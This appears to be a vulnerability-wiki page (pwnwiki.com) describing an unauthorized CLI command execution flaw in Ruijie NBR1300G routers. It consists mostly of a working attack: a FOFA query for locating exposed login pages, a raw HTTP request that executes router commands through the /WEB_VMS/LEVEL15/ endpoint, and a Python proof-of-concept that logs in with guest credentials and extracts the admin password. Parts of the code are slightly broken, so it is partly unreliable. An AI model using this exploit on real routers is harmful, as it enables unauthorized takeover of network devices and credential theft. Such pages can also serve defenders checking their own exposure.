免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
FOFA
title="锐捷网络 --NBR路由器--登录界面"
Request
POST /WEB_VMS/LEVEL15/ HTTP/1.1 Host: Connection: keep-alive Content-Length: 73 Authorization: Basic User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: */* Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6 Cookie: auth=; user= x-forwarded-for: 127.0.0.1 x-originating-ip: 127.0.0.1 x-remote-ip: 127.0.0.1 x-remote-addr: 127.0.0.1 command=show version&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
POC
#!/usr/bin/python3 #-*- coding:utf-8 -*- # author : PeiQi # from : http://wiki.peiqi.tech import base64 import requests import random import re import json import sys def title(): print('+------------------------------------------') print('+ \03334mPOC_Des: http://wiki.peiqi.tech \0330m') print('+ \03334mGithub : https://github.com/PeiQi0 \0330m') print('+ \03334m公众号 : PeiQi文库 \0330m') print('+ \03334mVersion: 锐捷NBRNBR1300G 路由器 越权CLI命令执行漏洞 \0330m') print('+ \03336m使用格式: python3 poc.py \0330m') print('+ \03336mUrl >>> http://xxx.xxx.xxx.xxx \0330m') print('+------------------------------------------') def POC_1(target_url): vuln_url = target_url + "/WEB_VMS/LEVEL15/" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36", "Content-Type": "application/x-www-form-urlencoded", "Authorization": "Basic Z3Vlc3Q6Z3Vlc3Q=" } data = 'command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.' try: response = requests.post(url=vuln_url, data=data, headers=headers, verify=False, timeout=10) print("\03336mo 正在执行 show webmaster user \0330m".format(target_url)) if "webmaster" in response.text and " password" in response.text and response.status_code == 200: user_data = re.findall(r'webmaster level 0 username admin password (.*?)<OPTION>', response.text)0 print("\03336mo 成功获取, 管理员用户账号密码为: admin/{} \0330m".format(user_data)) else: print("\03331mx 请求失败:{} \0330m") except Exception as e: print("\03331mx 请求失败:{} \0330m".format(e)) sys.exit(0) if __name__ == '__main__': title() target_url = str(input("\03335mPlease input Attack Url\nUrl >>> \0330m")) POC_1(target_url)
PWNWIK.COM